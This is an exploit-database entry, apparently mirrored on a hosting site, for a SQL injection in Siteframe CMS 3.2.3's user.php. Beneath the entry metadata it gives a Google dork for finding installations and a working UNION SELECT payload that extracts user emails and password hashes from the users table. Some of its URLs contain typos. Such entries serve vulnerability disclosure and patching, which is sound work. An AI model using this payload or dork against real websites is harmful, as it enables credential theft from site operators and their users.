[] NeoSense
E X P L O I T S
title author type platform port cve id

Siteframe CMS 3.2.3 - 'user.php' SQL Injection

Author: AnGrY BoY
type: webapps
platform: php
port: 
date_added: 2010-12-29 
date_updated: 2016-12-14 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsiteframe-3.2.3.tar.gz
# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A

# expolit:

# http://localhost/path/user.php?id=[SQL]

# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--

======================================================================================
# Special Thanks:- all h4kurd members
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.